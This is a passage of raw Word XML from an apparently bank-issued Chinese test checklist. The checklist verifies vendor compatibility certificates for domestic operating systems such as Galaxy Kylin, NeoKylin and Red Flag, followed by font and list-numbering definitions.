                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>提供国产化操作系统厂商出具的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>兼容认证证书或认证报告，</w:t>
            </w:r>
            <w:r>
              <w:t>包括</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>银河麒麟、中标麒麟、中科红旗等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宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>预期结果</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Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="宋体"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果1：具备国产化操作系统厂商出具的兼容认证证书或认证报告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测试工具：</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测试记录</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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">银河麒麟        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 未通过  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中标麒麟        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 未通过  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中科红旗        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 通过   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">口 未通过  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 未测试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备注</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60"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人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </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Narrow">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0606020202030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="仿宋_GB2312">
    <w:altName w:val="仿宋"/>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A0000287" w:usb1="28C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3531743"/>
      <w:docPartObj>
        <w:docPartGallery w:val="autotext"/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p>
        <w:pPr>
          <w:pStyle w:val="18"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>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C2A3E4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="80C2A3E4"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="8492243B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8492243B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="88792803"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="88792803"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="8C24C553"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8C24C553"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="8E8EFB66"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8E8EFB66"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="8EB40225"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8EB40225"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="90D5F3FD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="90D5F3FD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="9BE9A855"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9BE9A855"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="9C665033"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9C665033"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="A30628A8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A30628A8"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:nsid w:val="AAC00614"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AAC00614"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="BD3B05FA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BD3B05FA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:nsid w:val="C3B48606"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C3B48606"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:nsid w:val="CF85F8FE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF85F8FE"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="D457D1F9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D457D1F9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15">
    <w:nsid w:val="DAB3B837"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DAB3B837"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16">
    <w:nsid w:val="E0EB3149"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E0EB3149"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17">
    <w:nsid w:val="F3A30443"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F3A30443"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18">
    <w:nsid w:val="F9414E2F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F9414E2F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:nsid w:val="FB0495B4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FB0495B4"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20">
    <w:nsid w:val="02F12975"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="02F12975"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21">
    <w:nsid w:val="05357E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05357E8B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="70"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="703" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="71"/>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05A6169B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="05A6169B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23">
    <w:nsid w:val="06046120"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="06046120"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24">
    <w:nsid w:val="078C7039"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="078C7039"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25">
    <w:nsid w:val="08543323"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08543323"/>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1012BC67"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1012BC67"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27">
    <w:nsid w:val="134EB29D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="134EB29D"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28">
    <w:nsid w:val="141BBF77"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="141BBF77"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29">
    <w:nsid w:val="1BB0EE55"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1BB0EE55"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30">
    <w:nsid w:val="27813E8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27813E8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2EF40F3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EF40F3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316D0C51"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="316D0C51"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33">
    <w:nsid w:val="379D45FA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="379D45FA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34">
    <w:nsid w:val="3E495384"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3E495384"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="35">
    <w:nsid w:val="3EBB3C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EBB3C91"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:pStyle w:val="57"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1. "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="907"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="58"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="794" w:hanging="794"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="59"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="907"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="60"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1021" w:hanging="1021"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="61"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="1134"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="62"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1247" w:hanging="1247"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="63"/>
